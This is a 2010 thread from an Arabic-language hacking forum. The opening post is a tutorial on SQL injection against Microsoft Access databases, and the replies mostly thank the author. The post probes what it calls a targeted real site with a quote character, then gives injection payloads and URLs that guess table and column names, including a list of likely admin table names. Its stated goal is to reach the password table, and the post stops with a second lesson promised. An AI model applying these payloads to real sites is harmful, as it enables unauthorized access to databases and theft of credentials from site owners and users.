نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

[ منتدى حـقن قواعد البيانات | Sql injcetion ] قسم يهتم باهم ثـغرات الحقن .. حقن قواعد البيانات واهم الطرق المستعملة في ذلـك ,

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 05/05/2010, 19:18   المشاركة رقم: 1
المعلومات
الكاتب:
 ViRuS_Ra3cH  
اللقب:
الصورة الرمزية
 
الصورة الرمزية ViRuS_Ra3cH

البيانات
التسجيل : Mar 2010
العضوية : 2
الاهتمامات : DZ
الإقامة : DZ
المواضيع : 466
الردود : 629
المجموع : 1,095
بمعدل : 0.19 يوميا
الاختراقات : [ra3ch]
مجتمعنا : []
الصنف : Not Hacker
آخر تواجد : 02/01/2018/12:49
سبب الغياب : معكم ألي أخر ضربه أدا كتب ربي..
معدل التقييم: 10
نقاط التقييم: 18
ViRuS_Ra3cH is on a distinguished road
شكراً: 493
تم شكره 194 مرة في 101 مشاركة

 Algeria


الإتصالات
الحالة:
ViRuS_Ra3cH غير متواجد حالياً
وسائل الإتصال:

افتراضي (حصري) الدرس الأول : حقن قواعد بيانات الميكروزفت اكسس MsAccess


الموضوع باختصار ! [ حقن قواعد بيانات الميكروزفت اكسس ]

اولا حبيت اضع ملاحضة : انو اغلب الناس لا يفرقون بين قواعد البيانات ...

بلغة اوضح ان الواحد لما يسمع ( قاعدة بيانات ) يمشي في باله طوووول [ الاسكيول ] >> SQL

و هذا خطأ !!! لانه لازم نقدر نفرق بين انواع هذ القواعد DATABASE

اذكر بعض القواعد المشهوره و الاكثر انتشارا و استخداما في المواقع :

MySQL : طبعا هذه الاكثر انتشار الى حد الان ( و استغلالاتها منتشرة في جميع المنتديات ..)

MsSQL : ميكروزفت اسكيول سرفر Microzeft SQL Server : هذه القواعد لها استغلالات كثيرة ايضا

Oracle : مشهوره ايضا و لها ثغرات كثيرة ! ان شاء الله سانزل موضوع خاص بها و طرق استغلال ثغراتها

MsAccess : و هي موضوع درسنا اليوم نقرتين لعرض الصورة في صفحة مستقلة

Sybase : ليست مشهورة كثيرا لكن لها ثغرات ...

DB2 : غير مشهوره و لها ثغرات حقن ...

Informix : نوع اخر من قواعد البيانات و لها ثغرات قاتلة نقرتين لعرض الصورة في صفحة مستقلة

نرجع للموضوع !

لكل نوع من هذه القواعد نوع معين من الاخطاء اهمها و اشهرها !

الخطأ الذي يضهر في قواعد الاسكيول MySQL بعد اضافة الكوت ( ' )

كود:
You have an error in your SQL syntax

هذا بالنسبة لقواعد Mysql

######################################

اما ما يهمنا اليوم هو قواعد الميكروزفت اكسس MsAccess

الخطأ الذي يضهر بعد اضافة الكوت ( ' ) لن يكون مثل SQL

سيكون غالبا على هذا الشكل

كود:
Microsoft JET Database Engineerror 'xxxxx'
انا عامل شرح بسيط بالصور لطريقة الاستغلال

يلا نشوف

هذا الموقع المستهدف

نقرتين لعرض الصورة في صفحة مستقلة

و هذا الرابط المصاب

نقرتين لعرض الصورة في صفحة مستقلة

الان احنا سنضيف الكوت ( ' ) بعد الرابط مباشرة و نشوف ماذا يصير

نشوف صورة الرابط

نقرتين لعرض الصورة في صفحة مستقلة

و نشوف شو صار في الموقع ...

نقرتين لعرض الصورة في صفحة مستقلة

كما هو واضح في الصورة الاخيرة ضهر لنا خطأ ::

كود:
Microsoft JET Database Engine error '80040e14' 
 Syntax error in string in query expression  '((documents.docID)=892') ORDER BY docorder;'. 
 /doc.asp,  line 145

و هذا يعني ان الموقع يستخدم قاعدة بيانات ميكروزفت اكسس

و القاعدة بها ثغرة !!!


اولا احب اوضح ان استغلال ثغرات الاكسس يعتمد بشكل كبييير على التخمين

تخمين اسماء الجداول تم تخمين اسماء الاعمدة

و لن نحتاج الى معرفة عدد الجداول مثل ما نفعل في قواعد الاسكيول

يلا نشوف الاستغلال كيف ::

نكتب بعد الرابط المصاب هذا الكود

كود:
+and+0<=(select+count(*)+from+XXXXXX)+and+1=1

طبعا نضع مكان XXXXXX اسم الجدول

و ما يهمنا نحن هو جدول المدير او الجودل الي فيه كلمات السر ...

يعني التخمين سيكون على هذا الشكل ::

admin
administrateur
user
users
admin_login
administrator
...
طبعا كل واحد يخمن على طريقتو ...

نشوف صورة الرابط كيف راح يكون بعد اضافة كود الحقن

نقرتين لعرض الصورة في صفحة مستقلة

نرجع للموقع المصاب و نجرب عليه

كود:
في هذا المثال ما راح اجرب على جدول كلمات السر ...

لان الموقع عربي و ما يستاهل اني اخترقو و اسف لاني ما وجدت موقع غيرو اجرب عليه ( الوقت ما يسمح ... )

يلا نشوف ::

اجرب جدول ( Dz_4all ) ^^

كود:
doc.asp?action=showdoc&docid=892+and+0<=(select+count(*)+from+Dz_4all)+and+1=1


نشوف شو صار في الموقع ::

نقرتين لعرض الصورة في صفحة مستقلة

ضهر خطأ يقول ان الجدول (Dz_4all ) غير موجود ...

يلا نجرب غيره ::

نضع articles مكانDz_4all و نشوف

كود:
doc.asp?action=showdoc&docid=892+and+0<=(select+count(*)+from+articles)+and+1=1
les)+and+1=1

نقرتين لعرض الصورة في صفحة مستقلة


يا سلآآآم !

ما ضهر معانا خطأ :: يعني ان اسم الجدول articles موجود في قاعدة البيانات نقرتين لعرض الصورة في صفحة مستقلة

عمل رائع الى حد الان لكن المشوار مازال طويل ...


الان سنقوم نتخمين اسماء الاعمدة في الجدول الذي و جدناه

و الكود سيكون على هذا الشكل ::

كود:
+and+0<=(select+count(XXXXX)+from+articles)+and+1=1
from+articles = هذا الجدول الذي عرفناه

كود:
doc.asp?action=showdoc&docid=892+and+0<=(select+count(XXXXXX)+from+articles)+and+1=1
و كالعادة نضع مكان XXXXXX اسم العمود ...


يلا نجرب :: نضع كلمة DZ_4all مكان XXXXXX و نشوف نقرتين لعرض الصورة في صفحة مستقلة

كود:
doc.asp?action=showdoc&docid=892+and+0<=(select+count(DZ_4all)+from+articles)+and+1=1
نقرتين لعرض الصورة في صفحة مستقلة

ضهر معانا خطأ :: يعني عمود DZ_4all عير موجود في هذا الجدول

نجرب غيرو ...

docid

كود:
doc.asp?action=showdoc&docid=892+and+0<=(select+count(docid)+from+articles)+and+1=1
نشوف الموقع ::

نقرتين لعرض الصورة في صفحة مستقلة

ما طلع معانا اخطاء ! يعني ماشين في الطريق الصحيح نقرتين لعرض الصورة في صفحة مستقلة

تم انجاز 66% من العمل و باقي غير نطلع البيانات الموجودة داخل العمود


سنكتفي بهذا القدر اليوم

اشوف ردودكم و تشجيعاتكم و بعد ذلك انزل الدرس الثاني ^^



آخر مواضيع » ViRuS_Ra3cH

توقيع : ViRuS_Ra3cH

IS-SEC.ORG is ThE NaMe AnD HaKiNg Is ThE GaMe So FoRgEt ThE Name AnD LeT'S PlaY ThE GaMe
=======
[email protected]
=====
ViRuS_Ra3cH
====

===

عرض البوم صور ViRuS_Ra3cH   رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ ViRuS_Ra3cH على المشاركة المفيدة:
c41virus (12/03/2012)
قديم 05/05/2010, 22:50   المشاركة رقم: 2
المعلومات
الكاتب:
 yasMouh  
اللقب:

الإتصالات
الحالة:
yasMouh غير متواجد حالياً
وسائل الإتصال:

الله الله الله
شرح قمة فالاحترافية اخي رعش

بارك الله فيك ونفع بك

عرض البوم صور yasMouh   رد مع اقتباس
قديم 31/05/2010, 21:25   المشاركة رقم: 3
المعلومات
الكاتب:
 lasbat-dz  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
lasbat-dz غير متواجد حالياً
وسائل الإتصال:

**** يا اخي على الشرح

عرض البوم صور lasbat-dz   رد مع اقتباس
قديم 01/07/2010, 19:59   المشاركة رقم: 4
المعلومات
الكاتب:
 ALGHeArT  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
ALGHeArT غير متواجد حالياً
وسائل الإتصال:

بارك اللهف يك على الدرس ولكن الصور لا تظهر فهل ممكن اعادة تحميلها أو ووضع شرح فيديو على كل حال بارك الله فيك

عرض البوم صور ALGHeArT   رد مع اقتباس
قديم 20/07/2010, 09:13   المشاركة رقم: 5
المعلومات
الكاتب:
 aloner  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
aloner غير متواجد حالياً
وسائل الإتصال:

wooowowowo nice work my freind

عرض البوم صور aloner   رد مع اقتباس
قديم 05/08/2010, 08:32   المشاركة رقم: 6
المعلومات
الكاتب:
  MdMn HaCk3r  
اللقب:
.: المدير السابق للمنتدى :.

الإتصالات
الحالة:
MdMn HaCk3r غير متواجد حالياً
وسائل الإتصال:

يعطيك الف عافية اخي شرح وافي
تحيتي لك

عرض البوم صور MdMn HaCk3r   رد مع اقتباس
قديم 17/12/2010, 22:31   المشاركة رقم: 7
المعلومات
الكاتب:
 xdvb  
اللقب:
.: طالب اختراق المواقع :.

الإتصالات
الحالة:
xdvb غير متواجد حالياً
وسائل الإتصال:

جزاك الله كل خير اخي رعش

هل تستطيع شرح بالفيديو افضل

.

عرض البوم صور xdvb   رد مع اقتباس
قديم 13/05/2011, 13:34   المشاركة رقم: 8
المعلومات
الكاتب:
 h4x0r  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
h4x0r غير متواجد حالياً
وسائل الإتصال:

شرح جميل اخي الكريم

و سلمت يداك

عرض البوم صور h4x0r   رد مع اقتباس
قديم 29/05/2011, 18:50   المشاركة رقم: 9
المعلومات
الكاتب:
 zerocool  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
zerocool غير متواجد حالياً
وسائل الإتصال:

تسلم ايدك علي الشرح الجميل دا

عرض البوم صور zerocool   رد مع اقتباس
قديم 19/08/2011, 22:32   المشاركة رقم: 10
المعلومات
الكاتب:
 9lbi hacker  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
9lbi hacker غير متواجد حالياً
وسائل الإتصال:

يكون اكذب عليك اذا قت لك مبدع


اخي انت اكثر من مبدع

تقبل تحياتي

عرض البوم صور 9lbi hacker   رد مع اقتباس
قديم 11/03/2012, 18:32   المشاركة رقم: 11
المعلومات
الكاتب:
 ViRuS_Ra3cH  
اللقب:

الإتصالات
الحالة:
ViRuS_Ra3cH غير متواجد حالياً
وسائل الإتصال:

مشرفني مروركم هههه ثنكس

عرض البوم صور ViRuS_Ra3cH   رد مع اقتباس
قديم 06/04/2012, 20:16   المشاركة رقم: 12
المعلومات
الكاتب:
 dr.kasper  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
dr.kasper غير متواجد حالياً
وسائل الإتصال:

إبدآع بصرآحة ...

يعطيك آلعآفية يآ غآلى ..


تحيآتى إلك ..

عرض البوم صور dr.kasper   رد مع اقتباس
قديم 29/08/2012, 16:30   المشاركة رقم: 13
المعلومات
الكاتب:
 M.H  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
M.H غير متواجد حالياً
وسائل الإتصال:

مشكوووور .. بس وين الصور مفقودات .. اذا بكووون فيديو اسهل واحسن

Thanks ViRuS_Ra3cH

عرض البوم صور M.H   رد مع اقتباس
قديم 04/01/2013, 00:23   المشاركة رقم: 14
المعلومات
الكاتب:
 gholoom  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
gholoom غير متواجد حالياً
وسائل الإتصال:

بارک الله فيک

عرض البوم صور gholoom   رد مع اقتباس
قديم 21/02/2013, 20:58   المشاركة رقم: 15
المعلومات
الكاتب:
 meh01  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
meh01 غير متواجد حالياً
وسائل الإتصال:

**** و بارك الله فيك

عرض البوم صور meh01   رد مع اقتباس
قديم 13/07/2013, 18:31   المشاركة رقم: 16
المعلومات
الكاتب:
 MatrixGuy  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
MatrixGuy غير متواجد حالياً
وسائل الإتصال:

جييييييييييد اخي

عرض البوم صور MatrixGuy   رد مع اقتباس
قديم 21/07/2013, 01:20   المشاركة رقم: 17
المعلومات
الكاتب:
 ZzozZ  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
ZzozZ غير متواجد حالياً
وسائل الإتصال:

مشكووووووووووور ويعطيك الف الف الف عافية

عرض البوم صور ZzozZ   رد مع اقتباس
قديم 26/12/2013, 00:39   المشاركة رقم: 18
المعلومات
الكاتب:
 saaditools  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
saaditools غير متواجد حالياً
وسائل الإتصال:

tnx brooooo l

عرض البوم صور saaditools   رد مع اقتباس
قديم 19/02/2014, 22:22   المشاركة رقم: 19
المعلومات
الكاتب:
 ayman2030  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
ayman2030 غير متواجد حالياً
وسائل الإتصال:

الف شكر اخي الكريم

عرض البوم صور ayman2030   رد مع اقتباس
قديم 22/07/2014, 19:00   المشاركة رقم: 20
المعلومات
الكاتب:
 Mr.MeDo  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
Mr.MeDo غير متواجد حالياً
وسائل الإتصال:

الله يبارك فيك

عرض البوم صور Mr.MeDo   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 223
00X , 11lov3life , 3RaQi , 9lbi hacker , aB0 m0h4nNa , Abd Er Raouf , AbO Ra3d , adelnobel , Admin , ahmad alyasaki , ahmad hkr , ahmedrbg , ALGHeArT , aligh , aloner , amer46 , ananasa , AnGeL25dZ , Anger Hacker , ANONYME , ApOcalYpse , arbi , ArTiN , AtT4CKxT3rR0r1ST , ayman2030 , A__M__K , محمد هاني صباغ , محمد50 , مدمراليهود , مراد , b0x , bachelor , badrou-25 , benaissa28 , bilal21dz , Bing , Black-ID , BlackMask , blackstars.dz , blandy26 , blue wolf , boubeDZ , bramejnet , BrOx-Dz , c41virus , chevr0sky , colzero , CRAZY HACKER , المجاهد , الميعادي الحر , المرعب القاتل , المفترس , الهاأأكر_الصاأأمت , الهكر الاخلاقي , البرىبوى , الديلر الفلسطيني , الشبح المرح , ابو تالين , اعمل بصمت , D3r K0n!G , devil ahmad , Diiga , dimadz , DOFRREUR1111 , DoWmAsTeR , Dr-Genix , Dr-Unex , Dr.AnTi_HaCkEr , dr.kasper , drogba , Dr_HamZa-T , Dz V!RuS , Dz.kH4 , Dz4Hack , dzspouka , Dz_V!rUs , Endyke , Ev!LScR!pT_Dz , Evil-dz , eXe+18 , ExPLo!T_Dz , برمجي و هكرز , faris , farouk ch , fethallah , gholoom , Giipsy , GokBoruEfe , Gomina7 , h4x0r , hacker almooot , hacker dz , Hacker Man , HACKER==MAN , Hacker_12 , Hacker_Dz , hackster , haha199 , hamza 12 , hamza_hack_dz , hardTARGET1234 , harris01 , Hidden Hacker , Hidden Pain , highvip , hk.Tyro , ib4dz , ibtihel , idix , illuminat , imad.dz27 , IQ-T34M , islammohamed , جريح احساس , دام علاء العماد , jack16 , jehaad , jnon Hacker , joker-dz , kamarado , kerneleisa , khalil cool , khalil19000 , killerman , kokohack , komaro , konami8 , lasbat-dz , lennix , liverpool_216 , luop1980 , M.H , M.tucX , ManiMan43 , marwane , MatrixGuy , mazy man , mbsoft , MdMn HaCk3r , med-z , mega-king , meh01 , Memo , Microsoft-Dz , midofahmey , midouvich , mohamed7x , mohDz-13 , moja4ed_fz , mostarom , moumouh206 , mr aBdEnOuR , Mr GooGle , Mr MuRdEr , Mr norvi , Mr.king18 , Mr.MeDo , mr.wax , MrAchraf , Muhammed05 , mvp1994 , n2n , n2nhacker , n4dz , nabilove , naruto-hacker , ndeem , ndz2015 , neo111 , niro2013 , NULL Pointer , رهطاوي1 , P1r4T0s D3v1L , Power_Dz , R3D 3RR0R , rampage , raouf160 , RaYm0n , RBANDZ , refland , S!l3nt D3V!l , S!N0 , S-japonia33 , s3cur1ty , S4wDz , saaditools , safa7_22 , saha21 , samidrif , scientist , sH3LL , shadid , SMOG , Sniper-Gaza.DZ , somar hacker , souf91 , souf911 , spid3r , str0m007 , tacha , tete23232002 , Th3 Viper , ThE JoCkEy , theoha , TiGeR HaCkEr , tnt dz , ToP-HaCkEr , toxine , عامر شعري , عبد الصمد. , vigital , ViRuS_Ra3cH , watchful eye , waxer , wolf_black , x0x0 , xdvb , yasMouh , zerocool , zero_cool , zizou dika , ZzozZ , _samo
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
(حصري) الدرس الثاني : فيديو حقن قواعد MsAccess ViRuS_Ra3cH [ منتدى حـقن قواعد البيانات | Sql injcetion ] 25 14/11/2015 07:47
الدرس الأول: ملف الــhtmlــــ الصغير: mbsoft دورة لغة الـ HTML من | [ mbsoft ] 15 09/07/2013 13:24
الدرس الأول (الهكر وأنواعه) ViRuS_Ra3cH دورة تخطي الحماية للسيرفرات | Crazy_Hacker 0 18/03/2010 01:20

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 03:48.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115